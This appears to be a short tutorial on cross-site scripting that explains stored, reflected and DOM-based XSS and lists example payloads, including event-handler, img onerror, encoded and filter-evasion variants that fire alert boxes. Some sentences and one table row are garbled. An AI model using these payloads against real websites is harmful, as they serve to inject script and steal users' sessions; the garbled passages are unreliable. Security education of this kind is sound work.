What are types of Cross-Site Scripting vulnerability ?
Cross-site Scripting can be classified into three major categories — Stored XSS, Reflected XSS, and DOM-based XSS.
Stored Cross-Site Scripting (Persistent XSS) Vulnerability
Using session cookie, the attackers can gain access to the users account and can get easy access to the user’s personal information.
Reflected Cross-site scripting vulnerability
In a reflected XSS attack, the attacker’s payloads are majorly sent with the request itself. It is reflected in users browser with can response includes the payload given in the HTTP request. Reflected XSS is not persistent in nature hence attackers need to push the payload to every victim individually using any different ways such as social engineering. Attackers send link view emails or other delivery methods to send a payload to the user for gaining access to cookies or Session id’s.
Cross-site scripting (XSS) vulnerability Payloads Basics:
Example: <a onmouseover=alert('HERE ITS XSS')>I AM HERE </a>
Here, for the payload given below, as you can see, the img src tries to load an image called x, which is not present on web server hence the event gets triggered without any user interaction and alert XSS window will generate on page.
Example: <img src=x onerror=alert(String.fromCharCode(88,83,83));>
Below are few latest XSS Payloads:
|<svg><a><rect width=100% height=100% /><animate attributeName=href to=//google.com>|
|http://site.com/somefuntion.php?session=”oncut=” ‘&direct=true&from=true&r=select_down& plang=’ |alert|
Hex encoding can be applied in two formats :
Payload <script>alert (document.domain)</script> will be encoded as : \\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e
Some interesting payloads are listed here:
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
<img src ?itworksonchrome?\/onerror = alert(1)
<? foo="><x foo='?><script>alert(1)</script>'>">
<sCript x>(((confirm)))``</script x>
The XSS payloads can be generated according to the situations of HTML elements used in the application. If you have any doubts on the XSS you can comment on the below comment section.